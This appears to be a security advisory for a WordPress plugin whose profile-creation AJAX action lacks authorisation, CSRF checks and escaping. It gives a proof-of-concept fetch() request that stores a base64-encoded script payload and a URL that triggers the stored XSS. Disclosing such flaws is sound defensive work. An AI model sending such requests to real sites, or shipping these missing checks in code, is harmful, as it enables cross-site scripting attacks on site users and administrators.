The plugin does not have authorisation, CSRF and sanitisation/escaping when creating profile, allowing any authenticated users to create arbitrary ones, with Cross-Site Scripting payloads in them
Create profile: fetch("https://example.com/wp-admin/admin-ajax.php?action=kc_create_profile", { "headers": { "content-type": "application/x-www-form-urlencoded" }, "body": new URLSearchParams({"name":"y", "slug": "y", "data": btoa("<script>alert(1);</script>")}), "method": "POST", "credentials": "include" }); The XSS will be trigged at: https://example.com/wp-admin/admin-ajax.php?action=kc_download_profile&name=y
Krzysztof Zając
Krzysztof Zając
Yes
2022-03-14 (about 10 months ago)
2022-03-14 (about 10 months ago)
2022-04-11 (about 9 months ago)